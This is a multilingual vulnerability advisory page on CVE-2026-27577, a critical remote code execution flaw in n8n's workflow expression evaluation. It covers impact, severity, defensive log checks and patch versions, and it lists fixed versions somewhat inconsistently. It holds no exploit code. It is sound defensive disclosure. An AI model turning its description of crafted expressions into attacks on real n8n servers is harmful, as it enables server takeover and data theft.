Plattform
nodejs
Komponente
n8n
Behoben in
1.123.23
2.0.1
2.10.1
1.123.22
CVE-2026-27577 describes a Remote Code Execution (RCE) vulnerability discovered in n8n, a workflow automation platform. This vulnerability allows an authenticated user with permission to create or modify workflows to execute arbitrary system commands on the host running n8n. The vulnerability impacts versions prior to 2.10.1, 2.9.3, and 1.123.22, and a patch is available.
An attacker exploiting this vulnerability could gain complete control over the n8n server. This includes the ability to install malware, steal sensitive data, and potentially pivot to other systems on the network. The attack vector involves crafting malicious expressions within workflow parameters, which, when evaluated by n8n, trigger the execution of arbitrary system commands. This is similar in concept to previous expression evaluation vulnerabilities in n8n (CVE-2025-68613), highlighting a recurring risk in this area of the application. The blast radius extends to any data processed by the affected n8n instance, as well as any systems accessible from the compromised server.
This vulnerability was publicly disclosed on 2026-02-25. The severity is CRITICAL (CVSS 9.9). There is no indication of this being added to the CISA KEV catalog at this time. Public proof-of-concept exploits are not yet widely available, but the nature of the vulnerability suggests that they are likely to emerge. Given the ease of exploitation once a PoC is available, organizations should prioritize patching.
Organizations heavily reliant on n8n for workflow automation, particularly those with complex workflows or a large number of users with workflow creation/modification privileges, are at significant risk. Shared hosting environments where multiple users share an n8n instance are also particularly vulnerable, as a compromised user could potentially impact other tenants.
• nodejs: Monitor n8n logs for unusual process executions or errors related to expression evaluation. Use ps aux | grep n8n to check for unexpected child processes spawned by n8n.
• generic web: Examine n8n access logs for requests containing suspicious characters or patterns in workflow parameter values. Use curl -I <n8n_url>/trigger/http to check for exposed endpoints that could be exploited.
• linux / server: Use journalctl -u n8n to filter for error messages or unusual activity related to workflow execution. Implement auditd rules to monitor file access and process creation related to n8n.
disclosure
Exploit-Status
EPSS
0.13% (33% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-27577 is to upgrade n8n to version 2.10.1, 2.9.3, or 1.123.22 or later. If immediate upgrading is not possible, consider restricting user permissions to prevent users from creating or modifying workflows. This limits the attack surface. Additionally, carefully review existing workflows for any suspicious expressions. While a WAF or proxy cannot directly prevent this vulnerability, it can help detect and block malicious requests. After upgrading, confirm the fix by attempting to create a workflow with a deliberately malicious expression (e.g., a command to list files) and verifying that it is rejected.
Actualice n8n a la versión 2.10.1, 2.9.3 o 1.123.22, o posterior. Si la actualización no es posible de inmediato, limite los permisos de creación y edición de flujos de trabajo a usuarios de confianza y/o implemente n8n en un entorno reforzado con privilegios restringidos del sistema operativo y acceso a la red.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-27577 is a critical Remote Code Execution vulnerability in n8n, allowing authenticated users to execute system commands through crafted workflow expressions.
You are affected if you are running n8n versions prior to 2.10.1, 2.9.3, or 1.123.22. Assess your n8n deployment immediately.
Upgrade n8n to version 2.10.1, 2.9.3, or 1.123.22 or later. As a temporary workaround, restrict user permissions to prevent workflow modification.
While no active exploitation has been publicly confirmed, the vulnerability's severity and ease of exploitation suggest it is likely to be targeted.
Refer to the n8n security advisories on their GitHub repository: https://github.com/n8n-io/n8n/security/advisories
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.